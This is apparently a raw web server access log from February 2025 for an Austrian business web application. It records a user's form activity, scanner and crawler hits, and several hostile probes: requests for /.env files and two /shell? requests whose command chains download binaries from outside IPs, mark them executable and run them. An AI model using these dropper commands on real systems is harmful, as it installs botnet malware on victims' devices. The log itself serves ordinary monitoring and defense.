178.165.186.69 - - [10/Feb/2025:19:11:26 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2906 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:11:26 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:11:30 +0100] "GET /entry.php?id=10271&&ser=211030 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=210968" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:11:30 +0100] "GET /gui/javascript/form_form.js?1739211090 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211030" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:11:47 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 8724 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:11:47 +0100] "GET /gui/javascript/form_form.js?1739211107 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:11:47 +0100] "GET /entry.php?id=10889&document_id=10347296& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:04 +0100] "POST /entry.php?id=10828 HTTP/1.1" 200 8784 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:04 +0100] "GET /gui/javascript/form_form.js?1739211124 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:04 +0100] "GET /entry.php?id=10889&document_id=10347296& HTTP/1.1" 200 1510 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:05 +0100] "GET /gui/javascript/form_form.js?1739211125 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10889&document_id=10347296&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /entry.php?id=11237&type=10665 HTTP/1.1" 200 276 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /entry.php?id=10676&&title=Belegsuche HTTP/1.1" 200 1392 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /gui/javascript/form_form.js?1739211126 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Belegsuche" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /entry.php?id=11239&mode=document&form=10665& HTTP/1.1" 200 2018 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1739211126 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11239&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /entry.php?id=11238&mode=document&form=10665& HTTP/1.1" 200 3305 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:07 +0100] "GET /gui/javascript/form_bu_document_workflow.js?1739211127 HTTP/1.1" 200 4900 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:07 +0100] "GET /gui/javascript/form_form.js?1739211127 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11238&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:06 +0100] "GET /entry.php?id=11240&mode=document&form=10665& HTTP/1.1" 200 2671 "http://hausegger.activities.at/entry.php?id=11237&type=10665" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:07 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:07 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2586 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:07 +0100] "POST /entry.php?id=11240 HTTP/1.1" 200 2672 "http://hausegger.activities.at/entry.php?id=11240&mode=document&form=10665&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:08 +0100] "GET /entry.php?id=10778&form=11066&name=list& HTTP/1.1" 200 2786 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:08 +0100] "GET /entry.php?id=10776&form=11066&name=list& HTTP/1.1" 200 1513 "http://hausegger.activities.at/entry.php?id=11240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:25 +0100] "GET /entry.php?id=10828 HTTP/1.1" 200 9142 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:25 +0100] "GET /gui/javascript/form_form.js?1739211145 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:25 +0100] "GET /entry.php?id=10889&document_id=& HTTP/1.1" 200 1509 "http://hausegger.activities.at/entry.php?id=10828" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:31 +0100] "GET /entry.php?id=10271&&ser=211090 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211030" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:12:31 +0100] "GET /gui/javascript/form_form.js?1739211151 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211090" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
167.94.145.103 - - [10/Feb/2025:19:13:08 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.145.103 - - [10/Feb/2025:19:13:11 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.103 - - [10/Feb/2025:19:13:11 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.103 - - [10/Feb/2025:19:13:11 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.103 - - [10/Feb/2025:19:13:12 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
178.165.186.69 - - [10/Feb/2025:19:13:36 +0100] "GET /entry.php?id=10271&&ser=211151 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=211090" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:13:36 +0100] "GET /gui/javascript/form_form.js?1739211216 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211151" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
45.148.10.186 - - [10/Feb/2025:19:13:56 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A6003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
178.165.186.69 - - [10/Feb/2025:19:14:36 +0100] "GET /entry.php?id=10271&&ser=211216 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211151" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:14:36 +0100] "GET /gui/javascript/form_form.js?1739211276 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211216" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
156.59.198.136 - - [10/Feb/2025:19:14:51 +0100] "GET /hausegger.activities.at/stats/lang/awstats-eu.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.148.10.186 - - [10/Feb/2025:19:15:19 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/67.0.3396.69 Mobile/16A366 Safari/604.1"
80.82.77.202 - - [10/Feb/2025:19:15:30 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
178.165.186.69 - - [10/Feb/2025:19:15:37 +0100] "GET /entry.php?id=10271&&ser=211276 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211216" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:15:37 +0100] "GET /gui/javascript/form_form.js?1739211337 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:16:37 +0100] "GET /entry.php?id=10271&&ser=211337 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:16:37 +0100] "GET /gui/javascript/form_form.js?1739211397 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211337" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:17:37 +0100] "GET /entry.php?id=10271&&ser=211397 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211337" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:17:37 +0100] "GET /gui/javascript/form_form.js?1739211457 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211397" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:18:38 +0100] "GET /entry.php?id=10271&&ser=211457 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=211397" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:18:38 +0100] "GET /gui/javascript/form_form.js?1739211518 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211457" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:19:38 +0100] "GET /entry.php?id=10271&&ser=211518 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211457" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:19:38 +0100] "GET /gui/javascript/form_form.js?1739211578 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211518" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:20:38 +0100] "GET /entry.php?id=10271&&ser=211578 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211518" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:20:38 +0100] "GET /gui/javascript/form_form.js?1739211638 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211578" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:21:38 +0100] "GET /entry.php?id=10271&&ser=211638 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211578" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:21:38 +0100] "GET /gui/javascript/form_form.js?1739211698 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211638" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:22:39 +0100] "GET /entry.php?id=10271&&ser=211698 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=211638" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:22:39 +0100] "GET /gui/javascript/form_form.js?1739211759 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211698" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:23:39 +0100] "GET /entry.php?id=10271&&ser=211759 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=211698" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:23:39 +0100] "GET /gui/javascript/form_form.js?1739211819 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=211759" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:23:59 +0100] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1879 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:23:59 +0100] "GET /gui/javascript/form_form.js?1739211839 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:00 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 2433 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /gui/javascript/form_form.js?1739211841 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1912 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 304 - "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:19:24:01 +0100] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://hausegger.activities.at/entry.php?id=10273&logout=true&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
162.142.125.204 - - [10/Feb/2025:19:24:36 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.204 - - [10/Feb/2025:19:24:43 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.204 - - [10/Feb/2025:19:24:45 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.204 - - [10/Feb/2025:19:24:48 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
15.236.64.73 - - [10/Feb/2025:19:31:28 +0100] "POST /wp-content/plugins/wp-ver.php HTTP/1.1" 404 308 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
156.59.198.136 - - [10/Feb/2025:19:35:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910221303_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.190.143.107 - - [10/Feb/2025:19:48:45 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 103.241.65.218/selfreps/telnet.arm5;chmod+777+/tmp/telnet.arm5;sh+/tmp/telnet.arm5" 400 383 "-" "-"
156.59.198.136 - - [10/Feb/2025:19:59:43 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230917225211.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:20:07:46 +0100] "GET /ed-test.2web.at/stats/lang/awstats-is.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.65.134.18 - - [10/Feb/2025:20:11:42 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
156.59.198.135 - - [10/Feb/2025:20:11:46 +0100] "GET /renault.2web.at/htdocs/binaries/10311644.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
176.65.134.18 - - [10/Feb/2025:20:11:50 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
156.59.198.136 - - [10/Feb/2025:20:15:46 +0100] "GET /renault.2web.at/htdocs/binaries/renault-/rs-155-fr.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [10/Feb/2025:20:17:02 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
213.81.197.186 - - [10/Feb/2025:20:18:22 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
156.59.198.135 - - [10/Feb/2025:20:19:46 +0100] "GET /renault.2web.at/htdocs/binaries/10197031.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:20:23:47 +0100] "GET /renault.2web.at/htdocs/binaries/10126849.xls HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [10/Feb/2025:20:30:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.82.32.207 - - [10/Feb/2025:20:31:04 +0100] "GET /images/tri.png HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
47.82.32.207 - - [10/Feb/2025:20:31:05 +0100] "GET /images/tri.png HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
156.59.198.135 - - [10/Feb/2025:20:35:12 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/copy.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:20:39:12 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/center.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:20:43:14 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/listbox.gif HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:20:47:18 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/print.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:20:51:18 +0100] "GET /ed-test.2web.at/stats/lang/awstats-tw.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.35 - - [10/Feb/2025:20:57:17 +0100] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+efefa7;wget+http:/\\/176.65.140.135/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\\/176.65.140.135/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
156.59.198.135 - - [10/Feb/2025:21:07:20 +0100] "GET /renault.activities.at/htdocs/binaries/10269839.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:21:11:20 +0100] "GET /ed-test.2web.at/stats/lang/awstats-si.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:21:28:20 +0100] "GET /renault.2web.at/htdocs/binaries/10126848.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
